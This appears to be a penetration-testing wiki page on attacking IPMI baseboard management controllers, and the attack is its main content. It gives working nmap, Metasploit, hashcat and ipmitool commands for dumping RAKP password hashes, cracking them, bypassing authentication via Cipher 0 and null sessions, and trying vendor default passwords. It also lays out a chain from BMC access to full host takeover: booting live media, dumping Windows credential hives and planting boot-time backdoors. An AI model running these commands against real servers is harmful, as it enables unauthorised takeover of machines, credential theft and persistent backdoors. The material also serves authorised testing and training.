Skip to content
Codex Codex

IPMI

T1046 Network Service Discovery T1078 Valid Accounts T1110 Brute Force Credential Theft RCE Internal Access

TL;DR

Section titled “TL;DR”

IPMI is the out-of-band management protocol baked into most enterprise server hardware - Dell iDRAC, HP iLO, IBM IMM, Supermicro IPMI/BMC. It listens on UDP 623 and provides total control of the host independent of the host’s operating system: power on/off, virtual KVM, virtual media (mount an ISO and boot from it). The protocol has multiple well-documented design flaws - the most useful being the RAKP authentication-hash retrieval which leaks password hashes without authentication.

# 1. UDP scan (IPMI is UDP)
sudo nmap -sU -p623 <target>


# 2. Probe with msfconsole's ipmi_version
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS <target>
msf > run


# 3. RAKP hash retrieval (CVE-2013-4786)
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set RHOSTS <target>
msf > run
# → emits hashes for every BMC user account, suitable for hashcat -m 7300


# 4. Try vendor defaults
ipmitool -I lanplus -H <target> -U admin -P admin sel list
ipmitool -I lanplus -H <target> -U ADMIN -P ADMIN user list

Success indicator: ipmi_dumphashes emits one hash per local BMC user, or ipmitool sel list returns the system event log. Cracking an extracted hash yields BMC admin credentials, and from there it’s full host control.

Protocol overview

Section titled “Protocol overview”

IPMI = Intelligent Platform Management Interface, defined by Intel (1998), now an open spec. The BMC (Baseboard Management Controller) is a dedicated microcontroller on the server motherboard with its own NIC, CPU, RAM, and OS - typically a small Linux running on an ASPEED or Renesas chip. It runs even when the host is powered off (as long as the chassis has power).

What the BMC provides:

CapabilityWhat you can do with BMC access
Power controlPower on, power off, reset, soft shutdown
Console / Serial-over-LANWatch the boot process, see kernel panics, interact with the BIOS
Virtual KVMFull graphical console - keyboard, video, mouse - over the network
Virtual mediaMount a local ISO or floppy on the host - boot a live CD with your tools
Sensor monitoringTemperature, fan speed, voltages, system event log
Firmware updateFlash new BIOS, BMC firmware
Local user accountsManage BMC’s own user list (independent of host OS)

The implication: BMC root = host root. With virtual media + reboot, you mount your live USB ISO, boot the host into your environment, and read/write any data on the host’s disks. Disk-encryption-at-rest is the only meaningful defense against a compromised BMC, and even that often loses to a coercive cold-boot if you have physical access semantics.

Vendor BMC names

Section titled “Vendor BMC names”
VendorBMC product nameDefault user
DelliDRAC (Integrated Dell Remote Access Controller)root / calvin
HP / HPEiLO (Integrated Lights Out)Administrator / random factory password (printed on a sticker, often password)
IBM / LenovoIMM (Integrated Management Module), IMM2, XCCUSERID / PASSW0RD (zero, not O)
SupermicroIPMI / SMC IPMIADMIN / ADMIN
CiscoCIMC (Cisco Integrated Management Controller)admin / password
FujitsuiRMC (integrated Remote Management Controller)admin / admin

These defaults persist surprisingly often in production. Sysadmins rack a server, configure the host OS, and never touch the BMC after factory.

Default configuration

Section titled “Default configuration”

The IPMI specification mandates certain user-management defaults:

  • User slot 1 reserved for “anonymous” (no name, no password) - usually disabled but not always
  • User slot 2 is typically the named admin account
  • Up to 15 named user accounts (limit varies by vendor)
  • Each user has channel-specific privilege (Callback / User / Operator / Administrator / OEM)
  • Each user has cipher-suite policy

Default cipher suites in older IPMI 2.0 implementations include Cipher 0 - which advertises encryption support but actually performs no encryption or authentication. Some BMCs ship with Cipher 0 enabled and accept connections that skip auth entirely.

Dangerous settings / vulnerabilities

Section titled “Dangerous settings / vulnerabilities”
IssueWhat it enables
CVE-2013-4786 / RAKPPre-auth password-hash retrieval - design flaw, not patchable
Cipher 0 enabledAuth-bypass - connect and run privileged commands without credentials
Default credentials unchangedVendor defaults work directly
BMC exposed to public internetAnyone on the internet can attack it
BMC on same subnet as productionCompromise lateral-spreads quickly
Firmware not updatedBMC firmware itself contains exploitable services (web app, SSH, SNMP)
Anonymous null-session enabledSome IPMI implementations allow channel 1 with empty user
Web UI on the BMCOften runs old Apache, old OpenSSL, with auth-bypass and command-injection CVEs
Telnet enabled on BMCPlaintext credentials, complete control via SMASH-CLP shell
SSH on BMC with shared default keyMany vendors ship a default SSH key - pivot via that key

The RAKP vulnerability is the operator’s primary target - design-level (not patchable), works pre-auth, returns crackable hashes for every BMC user account.

Footprinting commands

Section titled “Footprinting commands”

UDP scan

Section titled “UDP scan”
Terminal window
sudo nmap -sU -p623 10.129.14.128
PORT    STATE         SERVICE
623/udp open|filtered asf-rmcp

open|filtered is the common UDP result. Confirm via Metasploit module:

Terminal window
msfconsole
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS 10.129.14.128
msf > run
[+] 10.129.14.128:623 - IPMI - IPMI-2.0
   UserAuth(auth_msg, auth_user, non_null_user)
   PassAuth(password, md5, md2)
   Level(2.0)
[*] Auxiliary module execution completed

That tells you IPMI 2.0 is running. The next step is RAKP hash retrieval.

RAKP hash retrieval (CVE-2013-4786)

Section titled “RAKP hash retrieval (CVE-2013-4786)”
Terminal window
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set RHOSTS 10.129.14.128
msf > set USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt
msf > run
[+] 10.129.14.128:623 - IPMI - Hash found: ADMIN:0a14000000000000a3b13c20...
[+] 10.129.14.128:623 - IPMI - Hash found: root:0a14000000000000bc4f9d35...
[+] 10.129.14.128:623 - IPMI - Hash found: operator:0a14000000000000ee2a..

The output format is <username>:<hex hash>. Each is a HMAC-SHA1 over a randomized challenge - same family as Kerberos AS-REP roasting, crackable offline.

The mechanics: the RAKP protocol exchanges a hash of the user’s password as part of the auth handshake. The flaw is that the BMC sends this hash before verifying that the requesting client knows the password - making the hash available to any client that can send well-formed RAKP messages.

Save the hash for hashcat:

$ipmi$ADMIN$0a14000000000000a3b13c20...

Format is $ipmi$<username>$<hex hash>. Then:

Terminal window
hashcat -m 7300 ipmi.hashes /usr/share/wordlists/rockyou.txt

-m 7300 is the IPMI 2.0 RAKP HMAC-SHA1 mode. Cracking rate is fast - typical hardware gets hundreds of millions of guesses per second on this mode. Most default and short passwords fall in minutes.

Vendor default credential test

Section titled “Vendor default credential test”

While ipmi_dumphashes cracks, in parallel try the vendor defaults:

Terminal window
ipmitool -I lanplus -H 10.129.14.128 -U admin -P admin user list

If creds work:

ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   ADMIN            true    true       true       ADMINISTRATOR
3   operator         true    true       true       OPERATOR
4                    true    false      false      Unknown (0x00)

ipmitool is the canonical CLI:

Terminal window
# Test connection
ipmitool -I lanplus -H <target> -U admin -P admin chassis status


# System event log
ipmitool -I lanplus -H <target> -U admin -P admin sel list


# Sensor readings
ipmitool -I lanplus -H <target> -U admin -P admin sdr


# Power state
ipmitool -I lanplus -H <target> -U admin -P admin power status


# Power on
ipmitool -I lanplus -H <target> -U admin -P admin power on


# Power off
ipmitool -I lanplus -H <target> -U admin -P admin power off


# Reset (hard reboot)
ipmitool -I lanplus -H <target> -U admin -P admin power reset


# Serial-over-LAN console
ipmitool -I lanplus -H <target> -U admin -P admin sol activate


# Network configuration
ipmitool -I lanplus -H <target> -U admin -P admin lan print 1


# List BMC users
ipmitool -I lanplus -H <target> -U admin -P admin user list


# Set a user password (when you have admin auth)
ipmitool -I lanplus -H <target> -U admin -P admin user set password 2 NewPass


# Enable a user
ipmitool -I lanplus -H <target> -U admin -P admin user enable 2

The -I lanplus selects IPMI 2.0 over LAN (correct for almost all modern BMCs).

Cipher 0 auth bypass

Section titled “Cipher 0 auth bypass”

If Cipher 0 is enabled, you skip authentication entirely:

Terminal window
ipmitool -I lanplus -C 0 -H 10.129.14.128 -U admin -P '' user list

-C 0 selects cipher zero. If it works, you can list users, change passwords, do anything - no actual auth performed.

Detection:

Terminal window
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS 10.129.14.128
msf > run

Anonymous / null-session

Section titled “Anonymous / null-session”

Some BMCs allow an anonymous channel-1 user (the IPMI spec’s “user 1, no name, no password”):

Terminal window
ipmitool -I lanplus -H 10.129.14.128 -U '' -P '' user list

If this works, you’ve got read access (sometimes write) without credentials.

Web UI enumeration

Section titled “Web UI enumeration”

Every modern BMC also runs a web UI on HTTPS (sometimes HTTP). Browse to it:

https://<target>/

Vendor-specific paths and login flows:

  • iDRAC: https://target/login.html
  • iLO: https://target/login.html (older) or /ssoauth/login (newer)
  • Supermicro: https://target/cgi/login.cgi
  • IMM2/XCC: https://target/

The web UIs themselves have had numerous CVEs - auth-bypass via HTTP request smuggling, command injection in CGI handlers, SQL injection on internal databases. Run a normal HTTP scan against the BMC’s web port - it often turns up findings independent of IPMI.

SSH on the BMC

Section titled “SSH on the BMC”

Many BMCs also expose SSH (for SMASH-CLP, a vendor-specific management shell):

Terminal window
ssh admin@<target>

Default creds match the IPMI defaults. SMASH-CLP shell commands let you do most of what IPMI lets you do - and on some vendor implementations, you can shell-escape into the BMC’s underlying Linux.

From BMC compromise to host compromise

Section titled “From BMC compromise to host compromise”

Once you have BMC admin:

  1. Serial-over-LAN console - watch the boot, intercept BIOS prompts, modify boot order via the BMC’s chassis-boot-device command:

    Terminal window
    ipmitool -I lanplus -H <target> -U admin -P admin chassis bootdev cdrom
    ipmitool -I lanplus -H <target> -U admin -P admin power reset
    ipmitool -I lanplus -H <target> -U admin -P admin sol activate

  2. Virtual media - through the web UI, mount a Linux live ISO from your attack box. Set bootdev to virtual CD. Reboot. You’re now booted into your own environment with the host’s disks visible.

  3. Read disks offline - once booted, the host’s drives appear as /dev/sda etc. Mount, copy SSH keys, dump SAM/SYSTEM hives (for Windows hosts), read database files.

  4. Modify host bootloader - write a backdoor into GRUB, an init script, or /etc/rc.local (for Linux) before unmounting. Boot the host normally - your backdoor activates on next boot.

  5. For domain-joined Windows - boot a live Windows PE, dump credentials from the SAM/SYSTEM hives offline (secretsdump.py against the file paths), and you have domain credentials.

The chain “exposed IPMI on public internet → RAKP hash crack → BMC admin → virtual media → domain controller compromise” is one of the most reliable cloud-data-center attack paths historically - many providers exposed BMC nets before this became widely understood.

Common chained workflows

Section titled “Common chained workflows”

Internet-exposed BMC → RAKP → host pwn:

  1. Shodan search port:623 for IPMI on internet
  2. ipmi_dumphashes
  3. Crack the hashes
  4. ipmitool + virtual media → host compromise

Internal BMC subnet → multi-host pwn:

  1. Inside a corporate network, identify the BMC management subnet (often 10.x.x.x/24 with hostnames like idrac-* or ilo-*)
  2. Mass ipmi_dumphashes against the subnet
  3. Many BMCs share the same admin password across the fleet
  4. Crack once, pwn all

BMC web UI → CVE exploit:

  1. Browser to the BMC HTTPS port
  2. Identify vendor + version from page source
  3. Check CVE database for that BMC version
  4. Many have unauth RCE in older firmware

Quick reference

Section titled “Quick reference”
TaskCommand
UDP scansudo nmap -sU -p623 <target>
IPMI version probemsf > use auxiliary/scanner/ipmi/ipmi_version
RAKP hash dumpmsf > use auxiliary/scanner/ipmi/ipmi_dumphashes
Cipher 0 testmsf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
Crack hashhashcat -m 7300 ipmi.hashes wordlist
Test credsipmitool -I lanplus -H <target> -U admin -P admin user list
Chassis statusipmitool -I lanplus -H <target> -U <u> -P <p> chassis status
Power on/off/reset`ipmitool … power [on
Serial consoleipmitool ... sol activate
Boot from CDipmitool ... chassis bootdev cdrom
List BMC usersipmitool ... user list
Set passwordipmitool ... user set password <id> <pass>
Sensorsipmitool ... sdr
Event logipmitool ... sel list
Defenses D3-NTA Network Traffic Analysis